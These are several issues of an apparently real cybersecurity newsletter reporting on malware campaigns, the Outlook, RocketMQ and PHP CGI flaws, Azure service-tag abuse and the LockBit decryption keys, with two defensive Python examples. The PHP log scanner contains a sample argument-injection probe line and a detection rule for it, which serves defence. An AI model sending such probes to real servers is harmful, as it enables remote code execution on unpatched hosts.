Android, Windows, Mac users beware



Welcome to Gone Phishing, your daily cybersecurity newsletter that's reeling in the latest threats hook, line, and sinker! 🎣🎣🎣

Today's hottest cybersecurity news stories:

  • 📱 Android, Windows, Mac users beware! Pakistani malware lurks 🕌

  • 📧 Microsoft Outlook flaw discovered that would allow zero-click attack

  • 🎣 Phishermen are using WARMCOOKIE as bait in backdoor campaign

Welcome to Hackistan 😬😬😬

🚨 Pakistan-linked Malware: Operation Celestial Force ☄️

Threat actors tied to Pakistan have been running a malware campaign dubbed Operation Celestial Force since at least 2018. The campaign pairs the Android malware GravityRAT with a Windows malware loader called HeavyLift, both administered through a panel the researchers call GravityAdmin.

🔒 Meet Cosmic Leopard

Cisco Talos tracks the adversary as Cosmic Leopard (aka SpaceCobra) and notes tactical overlap with Transparent Tribe. The malware suite has targeted users across the Indian subcontinent for years, which says something about its success and its continued evolution.

📱 Multi-platform Threat

GravityRAT was first documented in 2018 as Windows malware and has since gained Android and macOS variants. It has been used to harvest sensitive information from Indian military personnel and the Pakistan Air Force, disguised as cloud storage, entertainment, and chat apps.

🔗 Coordinated Attacks

Cosmic Leopard relies on spear-phishing and social engineering to talk targets into downloading GravityRAT or HeavyLift. GravityAdmin coordinates the activity, with named campaigns such as 'FOXTROT' and 'CRAFTWITHME' marking specific operations.

🖥️ HeavyLift's Role

HeavyLift, the newer addition, reaches Windows systems through malicious installers. It collects system information and polls a command-and-control (C2) server for new payloads; a macOS build behaves the same way.

👥 Targeting Defence and Government

The campaign mainly targets Indian defence, government, and technology organisations. Researchers emphasise both the sophistication and the long-term persistence of the operation.

Stay alert and secure! 🌐🔒

Instantly calculate the time you can save by automating compliance

Whether you're starting or scaling your security program, Vanta helps you automate compliance across frameworks like SOC 2, ISO 27001, ISO 42001, HIPAA, HITRUST CSF, NIST AI, and more.

Plus, you can streamline security reviews by automating questionnaires and demonstrating your security posture with a customer-facing Trust Center, all powered by Vanta AI.

Instantly calculate how much time you can save with Vanta.

[Calculate now]

Zero-clicks given 💀💀💀

🚨 Zero-Click Vulnerability in Microsoft Outlook! 💻

A serious remote code execution (RCE) vulnerability, CVE-2024-30103, has been disclosed in Microsoft Outlook. A specially crafted email can get arbitrary code running on the recipient's machine without the user clicking a link or opening an attachment.

📧 Zero-Click Danger

CVE-2024-30103 is alarming because it needs nothing from the user beyond the message being opened or rendered; Microsoft's advisory lists the Preview Pane as an attack vector. That makes it a potent tool for attackers who can get mail delivered to a mailbox.

🛡️ How It Works

Morphisec's analysis, which deliberately withholds exploit details, traces the flaw to how Outlook processes certain email components: a crafted message lets an attacker bypass Outlook's registry block lists and create malicious DLL files, executing code with the logged-on user's privileges. From there, full workstation compromise, data theft, or onward malware delivery are all on the table.

🌐 Widespread Impact

Given how widely Outlook is deployed in corporate and personal environments, CVE-2024-30103 poses a significant risk. Successful exploitation could result in major data breaches, financial losses, and reputational damage for organisations.

🔧 Mitigation Steps

Microsoft fixed the issue in its June 2024 Patch Tuesday release (11 June 2024). Users and administrators should apply the update immediately. Email filtering and monitoring on the mail gateway are also recommended as a layer that does not depend on every endpoint being patched.

💬 Expert Advice

"Zero-click vulnerabilities are particularly dangerous due to their lack of user interaction," a Morphisec spokesperson noted. "Organisations must prioritise patching and adopt multi-layered security measures to defend against sophisticated threats."

🚨 Stay Informed and Protected

At the time of writing there are no known in-the-wild attacks exploiting CVE-2024-30103. Make sure your systems are updated to close the window before that changes.

And that's the way the WARMCOOKIE crumbles 🍪🍪🍪

🚨 Job Scam Alert: WARMCOOKIE Backdoor 🎣

Cybersecurity researchers at Elastic Security Labs have uncovered a phishing campaign that uses job-themed lures to deliver a Windows backdoor named WARMCOOKIE. The backdoor scouts the victim's network and stages additional payloads.

📧 How It Works

Emails impersonating recruitment firms such as Hays and Michael Page prompt recipients to click a link for job details. After the target solves a CAPTCHA, an obfuscated JavaScript file is dropped; it launches PowerShell, which abuses the Background Intelligent Transfer Service (BITS) to download and run WARMCOOKIE.

🛡️ Capabilities and Tactics

WARMCOOKIE fingerprints the infected machine, captures screenshots, and drops further malicious programs. It talks to a hard-coded command-and-control IP address and encrypts traffic with a hard-coded RC4 key. Elastic tracks the activity as REF6127.

💻 Technical Breakdown

  • The phishing URL, hosted on compromised infrastructure, redirects victims to a landing page.

  • The backdoor establishes persistence with a scheduled task and performs anti-analysis checks before doing anything noisy.

WARMCOOKIE's commands include reading and writing files, executing commands via cmd.exe, enumerating installed applications, and taking screenshots. It resembles tooling used in earlier campaigns against a range of sectors.

🌐 Global Reach

WARMCOOKIE is gaining traction and is being aimed at users worldwide as part of phishing campaigns that lean on familiar job-recruitment themes.

📜 Related Campaigns

Trustwave SpiderLabs detailed a separate campaign that pairs invoice-themed decoys with Windows search functionality embedded in HTML. The emails carry a ZIP file containing an HTML page that invokes the "search:" protocol handler, opening Windows Explorer on a remote share that displays a shortcut (LNK) file; clicking it kicks off the malicious chain.

🔗 Stay Vigilant

These attacks still need user interaction, but they exploit trust in familiar interfaces (a CAPTCHA page, an Explorer window) to get it. Be cautious with email attachments and links, especially from unknown senders.

Stay alert and protect your systems! 🌐🔒

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵 Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈 Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!


Critical Apache RocketMQ Flaw for RCE



Welcome to Gone Phishing, your daily cybersecurity newsletter that's blasting off to cyber-space 🚀🚀🚀

Today's hottest cybersecurity news stories:

  • 🚀 Apache RocketMQ hit by Muhstik botnet 🤖

  • 📊 SASE Threat Report: Top tips for security 🔍

  • 🤖 AI-powered Recall recalled by Microsoft 🌐

Muh Muhstik brings all the bots to the yard 🤖🤖🤖

🚨 Muhstik Botnet Exploits Critical Apache RocketMQ Flaw for RCE 🐞

Security Alert! 🔍🛡️ The Muhstik botnet is exploiting a critical vulnerability in Apache RocketMQ (CVE-2023-33246) to gain remote code execution on Linux servers and IoT devices, which it then enrols for distributed denial-of-service (DDoS) attacks and cryptocurrency mining.

Key Details! 🧩🔍

Vulnerability: CVE-2023-33246, a critical flaw in Apache RocketMQ with a CVSS score of 9.8. It was fixed in RocketMQ 5.1.1 (for 5.x) and 4.9.6 (for 4.x) back in 2023, so every exploited instance is one that never got the update.

Targeted Systems: Linux servers and IoT devices.

Attack Vector: When the NameServer or broker components are exposed to the internet without permission checks, an attacker can execute commands as the user RocketMQ runs as, either by abusing the update-configuration function or by forging RocketMQ protocol content.

Malware Capabilities! 🦠🔍

  • System Metadata Collection: Gathers information about the infected system.

  • Lateral Movement: Spreads to other devices over SSH.

  • C2 Communication: Connects to a command-and-control domain over IRC to receive further instructions.

  • DDoS Attacks: Uses compromised devices to overwhelm target network resources.

Urgent Actions Required! 🛡️⚡

  • Patch Systems: Over 5,000 Apache RocketMQ instances remain exposed and vulnerable. Organisations must update to a fixed version immediately and stop exposing NameServer and broker ports to the internet.

  • Secure MS-SQL Servers: Apply strong passwords and change them regularly to blunt the brute-force attacks described below.

Expert Insights! 🧠💡

"Muhstik is a notorious threat that exploits known vulnerabilities in web applications to propagate its malware," noted security researcher Nitzan Yaakov. "With the ability to bypass protections through minor features, this vulnerability highlights the need for robust security measures."

Ongoing Threats! 🌐⚔️

  • Crypto Mining Activity: Previous Muhstik campaigns have dropped cryptominers post-infection, burning the computing power (and electricity bill) of compromised machines.

  • Brute-Force Attacks: The AhnLab Security Intelligence Center (ASEC) reports that poorly secured MS-SQL servers are frequent targets for a range of malware, including ransomware and remote access trojans.

Conclusion 🌟🔒

Given the severity of CVE-2023-33246 and the active exploitation by the Muhstik botnet, organisations need to act quickly. Updating Apache RocketMQ to a fixed version and locking down MS-SQL servers are the two concrete steps this week's reporting calls for.

Stay vigilant and protect your systems from this emerging threat! 🌐🛡️

Whatever you SASE 😬😬😬

🚨 Evolving Threat Landscape Calls for Comprehensive Cyber Threat Intelligence 🛡️

As cyber threats evolve, organisations need a unified view that combines external threat data, inbound and outbound threats, and their own network activity to understand their security posture.

Cato SASE Threat Report 📊🔒

Cato's Cyber Threat Research Lab (Cato CTRL) has released its first SASE threat report, mapping enterprise and network threats to the MITRE ATT&CK framework. The report draws on:

  • Data from 2,200+ customers.

  • 1.26 trillion network flows.

  • 21.45 billion blocked attacks.

What is Cato CTRL? 🕵️‍♂️

Cato CTRL combines human threat intelligence with network and security telemetry from Cato's AI-enhanced, global SASE platform.

Top 8 Findings:

AI Adoption 🤖

AI tools such as Microsoft Copilot and OpenAI ChatGPT are widely adopted across enterprises.

Hacker Forum Insights 💬

Hacker forums show trends such as LLM-enhanced tooling and services selling fake credentials and deepfakes.

Brand Spoofing 🔍

Brands such as Booking, Amazon, and eBay are being spoofed for fraud.

Lateral Movement in Networks ↔️

Enterprises still run insecure protocols that make lateral movement easy:

  • 62% of web application traffic is unencrypted HTTP.

  • 54% of traffic is telnet.

  • 46% of traffic is SMB v1 or v2.

Unpatched Systems Threat 🛠️

Unpatched systems, such as those still vulnerable to Log4j, remain a significant threat.

Industry-Specific Exploits 🏭

Different industries see different ATT&CK techniques, for example Endpoint Denial of Service and Credential Access.

Context in Threat Detection 🔍

Spotting suspicious activity depends on context; AI/ML models help supply it at scale.

Low DNSSEC Adoption 🌐

Despite its importance, DNSSEC adoption sits at only 1%.

Conclusion 📖

For more detailed insights and to understand the broader threat landscape, read the full SASE Threat Report.

Stay informed, stay protected! 🛡️

🎣 Catch of the Day!! 🌊🐟🦞

Stay ahead of the curve with Presspool.ai! 🚀 Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." 🤓💡 That's us, alright! 🤵 How about you? Visionary AI executive, much? 👀

And if the newsletter gets your motor running then you can take a butcher's at their cool AI marketing product too, which is sure to help you make the most of our new artificial overlords and put them to work for your business 🤖👩‍💻🌐

Rest assured, the process is very straightforward.

You simply:

🆕 Sign Up & Create Campaign

📊 Define your audience, budget, and message to captivate your audience.

🚀 Launch your campaign, as Presspool's AI matches it with ideal newsletter audiences for optimal reach and conversions. 🎯

🕵️ Finally, you leverage real-time analytics to track performance and refine future strategies. 📈 Elevate your marketing game and stay informed with Presspool.ai! 🌟 Simples! 🦦

Presspool.ai 📰🐊🤖 may just have what you need to succeed. And if the product isn't for you, the newsletter alone is a gamechanger. And we know newsletters 😉

Recalling all cars! 📢📢📢

🚨 Microsoft to Disable Controversial AI-Powered Recall Feature by Default 🚫🔍

Microsoft announced on June 7, 2024 that its controversial AI-powered Recall feature will be off by default and opt-in when Copilot+ PCs ship on June 18, 2024, a reversal driven by significant backlash from the security and privacy community.

About Recall 🔎

  • What it does: Recall takes screenshots of the user's screen every few seconds and builds an "explorable visual timeline" that can be searched to surface relevant information.

  • Availability: Exclusively on Copilot+ PCs.

Controversy ⚠️

  • Privacy Concerns: Critics argued that a searchable archive of everything on screen, including documents and messages, is exactly what an attacker or infostealer wants to find on a machine.

  • Negative Reactions: WIRED's Andy Greenberg labelled Recall "unrequested, pre-installed spyware," and Microsoft was criticised for the secrecy around its development.

Microsoft's Response 💡

User Control:

  • Users get full control over Recall, including the option not to save screenshots at all.

Security Enhancements:

  • Windows Hello authentication is required to enable Recall.

  • The search index database is encrypted.

  • Snapshots are decrypted only when the user authenticates ("just in time"), rather than sitting readable on disk.

Local Processing:

  • All Recall data is stored and processed locally on the device and is not sent to Microsoft or any other party.

User Experience 👤

  • Opt-in Process: Users go through a new setup flow to turn Recall on.

  • Visual Indicators: Recall is pinned to the taskbar, and a system tray icon shows when snapshots are being saved.

Enterprise Controls 🕹️

IT administrators can disable Recall on managed devices, but cannot enable it on a user's behalf.

Industry Reaction 🏭

Positive Steps: Security researcher Kevin Beaumont welcomed the move to make Recall opt-in, stressing that user choice heads off a lot of the potential security issues.

Microsoft's Commitment to Security 🔍

  • The decision sits under Microsoft's broader Secure Future Initiative (SFI), which puts security above other priorities.

  • CEO Satya Nadella has stressed that security comes first across all of Microsoft's operations.

  • The reversal aims to address the privacy and security concerns while Microsoft gathers feedback to refine the feature. For more details, read the full announcement from Microsoft.

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Google has dismantled 1,320 YouTube channels



Welcome to Gone Phishing, your daily cybersecurity newsletter that reels in the cyber-threats and doesn't believe in catch and release 👨‍🎣⚓

Today's hottest cybersecurity news stories:

  • 🧹 Google cleans house. 1000s of Chinese accounts removed 🗑️

  • 🌐 Microsoft warns of hackers targeting Azure vulnerabilities 👨‍💻

  • 🧪 PHP flaw exposes Windows servers to remote code attacks 🛰️

Google doesn't Play. #bullinaChinashop 🐂🐉🐼🥢💀

🚨 Google Shuts Down PRC Influence Campaigns 🚫

Major Takedown! 🛠️📺 Google has dismantled 1,320 YouTube channels and 1,177 Blogger blogs tied to a coordinated influence operation linked to the People's Republic of China (PRC). The content, in Chinese and English, focused on China and U.S. foreign affairs.

Key Actions! 📉📰

  • PRC Operation: Thousands of accounts across YouTube, Blogger, Ads, and AdSense terminated.

  • Indonesia Influence: Accounts promoting the ruling party were shut down.

  • Russian Network: 378 YouTube channels pushing pro-Russia content and disparaging Ukraine were taken down.

Global Reach! 🌐💻

  • Pakistan: 59 channels sharing Urdu content critical of local political figures.

  • France: 11 channels with French content critical of political figures.

  • Russia: 11 channels supporting Russia and criticising Ukraine.

  • Myanmar: 2 channels supporting the military government.

Emerging Threats! 🚨

Separately, OpenAI and Meta disrupted Stoic, a Tel Aviv-based firm spreading pro-Israel messaging in the U.S. and Canada during the Gaza conflict. The campaign relied on Facebook comments and links to its own websites, and genuine users frequently called it out as propaganda.

Olympic Concerns! 🏅🔍

Microsoft warns of escalating Russian disinformation campaigns targeting the 2024 Paris Olympics. AI-generated content is being used to undermine the Games and deter spectators through fabricated terrorism threats and claims of IOC corruption.

Stay Alert! 🔒

As these coordinated operations show, the fight against disinformation is ongoing. Stay informed and critical of the content you consume online.


Microsoft: It's a big problem, I can Azure you 😬😬😬

🚨 Microsoft Warns of Azure Service Tags Abuse ⚠️

Potential Threat! 💻⚠️ Microsoft is warning customers that an attacker can use Azure Service Tags to make requests look as though they come from a trusted Azure service, potentially slipping past firewall rules and reaching cloud resources that were never meant to be exposed.

Key Insights! 🔑🔍

  • Service Tags Risk: A service tag is a list of the IP prefixes a given Azure service sends traffic from. Any tenant's resource in that service shares those prefixes, so a rule that admits "traffic from the tag" admits every tenant. Service tags should be treated as a routing convenience, not a security boundary, and paired with authentication.

  • Affected Services: Tenable identified the issue in 10 Azure services, including Azure DevOps, Azure Machine Learning, and Azure API Management.

How It Works! 🛠️🔓

An attacker who controls a resource in one of those services (for example, a pipeline in their own Azure DevOps organisation) can point it at a victim's endpoint. The request arrives from an IP inside the service tag's range, so a firewall that relies solely on the tag for inbound filtering lets it through, even though it originates in a different tenant.

Microsoft's Response! 📝

  • Guidance Update: Microsoft's documentation now states explicitly that service tags alone are not sufficient to secure traffic.

  • Security Measures: Customers should review their network rules and add a mechanism that actually authenticates the trusted traffic.

Tenable's Findings! 🧐

Tenable researcher Liv Matan emphasised that attackers can impersonate trusted Azure services and bypass network controls built on service tags, which are commonly used to keep internal assets and services off the public internet.

Top Tips 🛡️

  • Enhance Validation: Use additional validation controls (authentication, signed requests, mTLS) alongside service tags.

  • Review Configurations: Regularly audit and update firewall rules and authentication mechanisms.

  • Stay Informed: Keep up with Microsoft's updates and security recommendations.

Stay vigilant and ensure your Azure configurations are secure! 🌐🔒
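To make the "routing mechanism, not a security boundary" point concrete, here is an added example (our own illustration, not code from Microsoft or Tenable) of the weak pattern and its fix. It parses a constructed JSON fragment in the shape of Microsoft's downloadable service-tag file (the prefixes are documentation ranges, not real Azure ranges), then compares an authorisation check that trusts the tag alone with one that also requires an HMAC-signed request. The shared secret, header name and signing scheme are assumptions for the example.

```python
import hashlib
import hmac
import ipaddress
import json

# Constructed sample in the shape of Microsoft's downloadable service-tag JSON.
# The prefixes are RFC 5737/3849 documentation ranges, not real Azure ranges.
SERVICE_TAGS_JSON = json.dumps({
    "values": [
        {"name": "AzureDevOps",
         "properties": {"addressPrefixes": ["203.0.113.0/24", "2001:db8:1::/48"]}},
        {"name": "AzureMachineLearning",
         "properties": {"addressPrefixes": ["198.51.100.0/25"]}},
    ]
})

# Hypothetical shared secret between the calling service and the receiving app.
APP_SECRET = b"rotate-me-and-store-me-in-key-vault"


def load_service_tags(raw):
    """Map service-tag name -> list of ip_network objects."""
    data = json.loads(raw)
    return {
        entry["name"]: [ipaddress.ip_network(p) for p in entry["properties"]["addressPrefixes"]]
        for entry in data["values"]
    }


SERVICE_TAGS = load_service_tags(SERVICE_TAGS_JSON)


def source_matches_tag(src_ip, tag):
    """True when src_ip falls inside any prefix published for the tag."""
    ip = ipaddress.ip_address(src_ip)
    return any(ip in net for net in SERVICE_TAGS.get(tag, []))


def sign_request(secret, method, path, body):
    """HMAC-SHA256 over method, path and body hash; the caller sends this in X-Signature."""
    msg = method.encode() + b"\n" + path.encode() + b"\n" + hashlib.sha256(body).digest()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def build_request(src_ip, signing_secret, method="POST", path="/webhook", body=b'{"run":1}'):
    """Constructed inbound request; a rogue caller signs with whatever key it has."""
    return {
        "src_ip": src_ip,
        "method": method,
        "path": path,
        "body": body,
        "headers": {"X-Signature": sign_request(signing_secret, method, path, body)},
    }


def allow_weak(req, tag):
    """Service tag as the only gate: the pattern Microsoft now warns against."""
    return source_matches_tag(req["src_ip"], tag)


def allow_hardened(req, tag, secret):
    """Service tag kept as a coarse network filter, plus per-request authentication."""
    if not source_matches_tag(req["src_ip"], tag):
        return False
    expected = sign_request(secret, req["method"], req["path"], req["body"])
    presented = req["headers"].get("X-Signature", "")
    return hmac.compare_digest(expected, presented)


if __name__ == "__main__":
    legit = build_request("203.0.113.10", APP_SECRET)
    # Attacker-controlled pipeline in another tenant: same egress prefix, no secret.
    rogue = build_request("203.0.113.77", b"attacker-guess")
    outside = build_request("192.0.2.1", APP_SECRET)
    for name, req in [("legit", legit), ("rogue", rogue), ("outside", outside)]:
        print(name, allow_weak(req, "AzureDevOps"), allow_hardened(req, "AzureDevOps", APP_SECRET))
```

The rogue request passes `allow_weak` and fails `allow_hardened`: the tag filter still keeps random internet hosts out, but only the signature distinguishes your tenant's service from someone else's running in the same prefix. Any per-request authentication (OAuth bearer tokens, mTLS with a pinned CA) serves the same purpose as the HMAC here.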

Hmm, what's the PHP threat level? 🥽🧪🔬

🚨 Critical PHP Flaw Exposes Servers to Remote Code Execution ⚠️

New Vulnerability Alert! 💻 A critical security flaw in PHP allows remote code execution (RCE) on Windows systems. Tracked as CVE-2024-4577, it is a CGI argument injection bug that affects every PHP version running in CGI mode on Windows, including branches that are end-of-life and will not be patched.

Key Details! 🔍

  • Vulnerability: CVE-2024-4577 bypasses the protections PHP added for CVE-2012-1823, the original php-cgi argument injection bug.

  • Affected Versions: All PHP versions on Windows; fixed in PHP 8.3.8, 8.2.20, and 8.1.29. Older branches (8.0, 7.x, 5.x) are affected and unsupported.

  • Locale-Specific: XAMPP is vulnerable in its default configuration when Windows is set to the Traditional Chinese, Simplified Chinese, or Japanese locale. Because the root cause is locale-dependent character conversion, other locales may be affected too, so administrators should not assume they are safe.

Research Findings! 🧪🔓

DEVCORE security researcher Orange Tsai traced the flaw to the Best-Fit feature of Windows encoding conversion, which can turn certain non-ASCII bytes into ASCII characters that php-cgi then interprets as command-line options. That lets an unauthenticated attacker bypass the earlier protections and execute arbitrary code on a remote PHP server.

Rapid Response! ⚡

  • Timeline: DEVCORE reported the bug to the PHP team on May 7, 2024; fixed releases shipped on June 6, 2024.

  • Security Recommendations: DEVCORE advises moving off the outdated PHP CGI mode to Mod-PHP, FastCGI, or PHP-FPM.

Exploitation in the Wild! 🌐💣

  • Immediate Detection: The Shadowserver Foundation observed exploitation attempts within 24 hours of disclosure.

  • Proof of Concept: watchTowr Labs built a working exploit, underlining the urgency of patching.

Expert Advice! 📢

"A nasty bug with a very simple exploit," noted security researcher Aliz Hammond. "Systems running affected configurations under the specified locales must patch immediately due to the high risk of mass exploitation."

Top Tips 🛡️

  • Apply Updates: Ensure PHP installations are updated to a fixed version.

  • Review Configurations: Shift to secure execution methods like Mod-PHP, FastCGI, or PHP-FPM; php-cgi should not be exposed to the internet on Windows at all.

  • Stay Informed: Monitor security advisories and apply patches promptly.

Stay secure and protect your PHP servers from this critical vulnerability! 🌐🔒
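The specific conversion DEVCORE documented is that a 0xAD byte (the soft hyphen) is best-fit mapped to an ASCII hyphen under code pages such as 932 (Japanese), 936 (Simplified Chinese) and 950 (Traditional Chinese), so a query string carrying a percent-encoded 0xAD can turn into a leading `-` that php-cgi reads as an option. That gives defenders a signature to hunt for. Below is an added example (ours, not DEVCORE's or watchTowr's tooling) that scans Apache combined-format access logs for that shape; the log lines are constructed for the demonstration, and the rule deliberately stays generic rather than matching any particular payload.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed Apache combined-format log lines (XAMPP ships Apache); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Jun/2024:10:01:22 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Jun/2024:10:02:47 +0000] "POST /index.php?%ADd+display_errors%3D1 HTTP/1.1" 200 64 "-" "curl/8.4.0"
198.51.100.3 - - [11/Jun/2024:10:03:01 +0000] "GET /search.php?q=%E2%80%93dash HTTP/1.1" 200 300 "-" "Mozilla/5.0"
198.51.100.8 - - [11/Jun/2024:10:04:15 +0000] "GET /page.php?id=5%AD HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SOFT_HYPHEN = 0xAD  # U+00AD; best-fit mapped to ASCII '-' under code pages 932/936/950


def query_bytes(target):
    """Percent-decode the query part of a request target to raw bytes ('+' left as is)."""
    _, _, query = target.partition("?")
    return unquote_to_bytes(query)


def is_ascii_letter(b):
    return 0x41 <= b <= 0x5A or 0x61 <= b <= 0x7A


def looks_like_cgi_arg_injection(target):
    """Flag a 0xAD byte that would become a leading '-' for php-cgi after best-fit mapping:
    either at the very start of the query string, or directly before an ASCII letter."""
    q = query_bytes(target)
    if not q:
        return False
    if q[0] == SOFT_HYPHEN:
        return True
    return any(b == SOFT_HYPHEN and is_ascii_letter(q[i + 1]) for i, b in enumerate(q[:-1]))


def scan_log(text):
    """Return (client_ip, request_target) for each suspicious line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        target = m.group("target")
        if looks_like_cgi_arg_injection(target):
            hits.append((line.split(" ", 1)[0], target))
    return hits


if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(f"possible CVE-2024-4577 probe from {ip}: {target}")
```

Only the second line fires: the en dash in the third line is a different byte sequence, and a trailing 0xAD with nothing after it (fourth line) cannot become an option. The same check maps directly onto DEVCORE's published stop-gap for Apache, a RewriteCond on QUERY_STRING beginning with %ad that returns 403; treat that as a bridge to patching or moving off CGI, not as the fix.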

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Sticky Werewolf is back and attacking a pharmaceutical company



Welcome to Gone Phishing, your daily cybersecurity newsletter that's casting out the scams and netting you the latest security tips! 🎣🎣🎣

Today's hottest cybersecurity news stories:

  • 🐺 Sticky Werewolf expands operations to Russia, Belarus 🌐

  • 🕵️ LightSpy's macOS variant has advanced surveillance 📡

  • 🔐 7000 LockBit ransomware decryption keys released by FBI 👮

It's a real howler! 🐺🐺🐺

🚨 Sticky Werewolf Strikes Again! 🐺

New Targets Unveiled! 🏭✈️💊 Sticky Werewolf is back, now attacking a pharmaceutical company, a Russian microbiology research institute, and the aviation sector. Previously focused on government organisations in Russia and Belarus, the group has broadened its horizons.

Phishing Tactics! 🎣📧💻

  • Method: Phishing emails with malicious links.

  • Payload: LNK files inside RAR archives, pointing at malware hosted on WebDAV servers.

  • Outcome: Delivers remote access trojans (RATs); earlier campaigns used NetWire, current ones Rhadamanthys and Ozone.

Complex Infection Chain! 🔗📁🦠

Opening an LNK file from one of these emails triggers a chain reaction:

  1. Executes a binary hosted on WebDAV.

  2. Runs an obfuscated batch script.

  3. Launches an AutoIt script that injects the final payload, sidestepping security software.

What's Next? 🚀🔍

Sticky Werewolf wraps the RATs in a crypter derived from CypherIT. Attribution remains unclear, though geopolitical clues hint at a possible pro-Ukrainian origin.

Other Wolves on the Prowl! 🐺

Sapphire Werewolf: Over 300 attacks on various Russian sectors.

Fluffy Wolf & Mysterious Werewolf: Use spear-phishing to deploy tooling such as Remote Utilities, the XMRig miner, WarZone RAT, and the RingSpy backdoor.

Stay vigilant and protect your digital realm! 🛡️🔒💻

The LightSpy who hacked me 🕵️🕵️🕵️

🚨 LightSpy Hits macOS! 💻

New Threats Uncovered! 💻📱 Cybersecurity researchers have found that LightSpy spyware, first seen targeting iOS users, also has a macOS variant. The cross-platform malware family has versions for Android, iOS, Windows, macOS, Linux, and various routers.

Key Findings! 🧐🔍

  • Exploits Used: CVE-2018-4233 and CVE-2018-4404, both Safari WebKit bugs.

  • Targets: macOS 10.13.3 and earlier, where those WebKit flaws are unpatched.

  • Payloads: A privilege escalation exploit, an encryption/decryption utility, and ZIP archives holding the implant.

How It Works! 🔗🛠️

  • Rogue HTML: Triggers code execution inside Safari.

  • Binary as PNG: A Mach-O binary disguised as an image delivers the next stage.

  • Shell Script: Fetches additional payloads.

  • Persistence: An "update" file acts as the loader that starts the implant on each boot.

Capabilities! 🛡️🎤📸

LightSpy's macOS variant uses 10 plugins to:

  • Capture audio and photos

  • Record screen activity

  • Extract and delete files

  • Execute shell commands

  • Harvest browser data and iCloud Keychain information

  • Perform network discovery

In the Wild! 🌐📅

Active since January 2024, the macOS variant has been seen on around 20 devices, most of them test units. Despite that limited reach, the full attack chain is a serious capability in the hands of whoever operates it.

Geopolitical Impact! 🌐🕵️‍♂️

Separately, reports of Pegasus spyware attacks on activists in Latvia, Lithuania, and Poland show that cyber espionage against Russian- and Belarusian-speaking journalists has been running since at least 2020.

Stay informed and secure! 🛡️🔒🌐


They're chomping at the LockBit 🔐🔐🔐

🚨 FBI Unlocks Decryption Keys for LockBit Victims! 🛡️

Big News! 🔓💻 The FBI has announced it holds over 7,000 decryption keys that can help victims of the LockBit ransomware recover their data for free. If you think you've been affected, visit the FBI's Internet Crime Complaint Center at ic3.gov.

Key Highlights! 🗝️🔍

  • LockBit's Reach: Linked to 2,400 attacks globally, 1,800 of them in the U.S.

  • Operation Cronos: Dismantled LockBit's online infrastructure in February 2024.

  • Key Figure: Dmitry Yuryevich Khoroshev, named by authorities in May 2024 as the alleged administrator, denies involvement.

Victim Assistance! 🆘

FBI Cyber Division Assistant Director Bryan Vorndran encourages victims to reach out. He also warns that paying a ransom doesn't guarantee data will be deleted, and victims may still face extortion later.

Ransomware Reality! 📊🔍

  • Recovery Rate: Organisations hit by ransomware recover only 57% of compromised data on average, according to the Veeam Ransomware Trends Report 2024.

  • Emerging Threats: New ransomware players such as SenSayQ and CashRansomware are on the rise and refining their tactics.

Evolving Tactics! ⚙️🦠

LockBit and other ransomware groups keep evolving. The TargetCompany ransomware now has a Linux variant aimed at VMware ESXi hosts, with Microsoft SQL servers used for initial access.

Stay Vigilant! 🚨

The FBI's key release is a big step, but organisations still need working, tested backups and an incident plan. Protect your data, and don't let cybercriminals hold you hostage!

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

